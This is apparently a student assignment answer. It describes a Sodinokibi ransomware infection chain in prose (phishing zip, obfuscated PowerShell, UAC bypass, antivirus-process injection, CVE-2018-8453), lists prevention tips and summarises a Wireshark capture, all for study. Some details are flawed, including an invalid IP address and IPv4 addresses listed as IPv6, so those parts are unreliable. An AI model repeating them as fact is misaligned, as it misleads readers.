BN200 Cyber Attacks And Network Protocol Analysers Assignment 2 Answer
Cyber attack is a type of spiteful attempt done by an individual or a group on a target system to get benefits from that system or network. These attacks are done mainly for two reasons, first is to disable the victim’s system and make it offline and second, is to get root or administrator level access of the system. There are so many attack methods to achieve this goal. These methods are categorized in different categories based on the level of harm and method of attack like malware, DoS or DDoS, MITM, SQL injection, etc. 
a. Identification of a cyber-attack – Ransomware is a type of cyber-attack where attack is done in the form of a malicious application which encrypt and lock the target system. Then the attacker demand for a ransom to restore data and unlock the system. The ransom is mostly demanded in the form of cryptocurrency. Paying the ransom will not ensure that our system will fully be restored by the attacker, in so many cases. Based on the type of business or importance of data, attacking measures are used in a more complex way. So that we cannot access even our system without entering a decryption key. Today, there are so many types of ransomwares which are used for cyber-attack. Each variant is more harmful than the previous. These are – crypto malware, lockers, scareware, doxware, Mac ransomware, RaaS and mobile devices. 
c. Technique and tools used – The attacker here use simple phishing attack to drop the infected file to the target system. An email is dropped to the victim which contains a zip file. This zipped file has a malicious java script which is stored in power shell script. When the user opens the link, the infection is spread throughout the system. They use a powerful measure that make this infection undetected from the antivirus application and easily pass the first line of defence. The infected file is primarily saved in temporary directory with the name jurhtcbvj.tmp which is a power shell script having so many exclamation marks. This file can be launched by a power shell command that remove the exclamation marks and run the true script. This power shell script encodes and execute another script which is having .NET codes encoded in Base64 module. This script combined with the previous power shell process execute another function named Install1. Which contains several modules named as test.dll and an Base64 encoded script which is then loaded into memory for further execution of processes. At the end, if it will not able to get full privileges it will attempt to gain access by User Access Control Bypass. When it gains enough access, it executes the complete process in several phases. Initially the primary module loaded into the memory and started loading another related module into the memory. It uses CheckTokenMembership to confirm the level of privilege. If the privileges are not sufficient, it again uses the UAC process and also write itself in the registry and launch a new instance of explorer.exe to execute scripts. By doing this, the attacker can execute anything stored at registry path with the highest privilege on that system. At the second phase, it executes portable executables into memory which are used as a final payload. The malware tries to insert ransomware payload into Ahnlab antivirus process. If the malware is able to find the required service, it launches an sutoup.exe process and finally run the payload Sodinokibi. This malware has encrypted data in RC4 encryption with the file extension of. grr. The related configuration file has complete details about the process to execute and being killed and how to get the access level of CVE-2018-8453. And finally, a ransom note is displayed to the user. 
d. Preventive measures used against the attack – here are some preventive measures in the form of best practices that can be beneficial to use against the ransomware attack. 
- Need to make sure that the system is up to date with current virus definition and updates. All the application also updated with available patches.
- Do not click or access any unwanted links and respond to such unknown emails.
- Always keep backup of the important data in any portable storage device.
- Do not always follow the notification messages when going online.
- Do not download data or any executable from unknown source.
B. Network Protocol Analyser
A network protocol analyser is a tool that is used to detect network packets or traffic on the communication channel. A communication channel can be from the local ethernet to satellite link. It is used to sniff the traffic, analyse network packets and find out any suspicious activities heling in the network. Wireshark is one of the mostly used network analysing tool which is used to sniff each network packet on a specific interface, in real time. This tool is free to use and majorly used in network troubleshooting.
- Details of analysed traffic – Most of the traffic is of secured http traffic working with TCP protocol. Length of the traffic if vary depending on the payload size, port and protocol in use. It uses both IPv4 and IPv6 addresses as source and destination address. Many of the payload are identified as protected payload (KP0), some belongs to application data, client hello packets, data packet, standard query packet, certificate and key exchange, SYN and ACK packets. Details can be seen in the below figure
Figure – Wireshark captures
- Details of NAT or routable IP addresses – As we analyse, there is no NAT (network address translation) is used in this connection. To confirm this, we use ‘nat-pmp’ packet filter in Wireshark that did not show any packet of NAT.
- Address and port details – The communication captured during this time frame, works with both IPv4 and IPv6 addresses. From the captured packets, there are several addresses which are used many times than other addresses. The most used IPv6 addresses are 2404:205:128b:caf3:558a:1041:2ffe:45e9, 2404:6800:4002:80b::200e, 2404:6800:4003:802::2004, 2404:6800:4003:c01::bd, 192.168.43.169 and 192.168.434.1. The used ports with these IP addresses are 443, 80, 52742, 57574 and 53.
- Details of findings – All the packets are captured from Ethernet interface. While analysing the hundreds of captured packets, we found so many entries with different source and destination IP addresses. These IP addresses are belonging to IPv4 and IPv6 addresses. The overall communication uses TCP, UDP, QUIC and DNS protocols. Corresponding packet length is depending upon the protocol used like http, https, DNS, etc. The protected payload (KP0) packet is belonging to secure http or https protocol which is secure protocol used to carry data in a secure format. The application data mostly uses this https (443) protocol and uses IPv4 address. These IPv4 addresses are same for the communication as source and destination address, respectively for each part of the communication. Many packets are using TLS version 1.2 encryption in transferring application data. Several PSH, ACK, SYN and RST packets are also captured. The Wireshark is almost capable to capture all the packets going between this system to the internet (on external server or destination) and we can view the entire captured frame with related details like frame size, interface, source address and port, destination port and address, protocol used and length of the packet.